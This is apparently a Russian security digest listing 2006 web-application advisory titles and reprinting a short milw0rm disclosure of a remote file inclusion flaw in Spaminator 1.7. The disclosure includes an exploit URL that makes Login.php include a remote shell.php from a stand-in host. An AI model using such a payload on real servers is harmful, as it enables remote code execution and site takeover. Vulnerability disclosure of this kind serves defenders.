Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl) [SA21430] hitweb "REP_INC" File Inclusion Vulnerability [SA21424] Ruby on Rails Unspecified Vulnerability [SA21435] Drupal Bibliography Module Cross-Site Scripting and SQL Injection [SA21438] MojoGallery "admin.cgi" Cross-Site Scripting Vulnerabilities From:MILW0RM <submit_(at)_milw0rm.com> Date:10 августа 2006 г.Subject:Spaminator 1.7. ($page) Remote File IncludeSpaminator 1.7. ($page) Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL: http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php? Greatz:str0ke # milw0rm.com [2006-08-10]
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
[SA21430] hitweb "REP_INC" File Inclusion Vulnerability
[SA21424] Ruby on Rails Unspecified Vulnerability
[SA21435] Drupal Bibliography Module Cross-Site Scripting and SQL Injection
[SA21438] MojoGallery "admin.cgi" Cross-Site Scripting Vulnerabilities
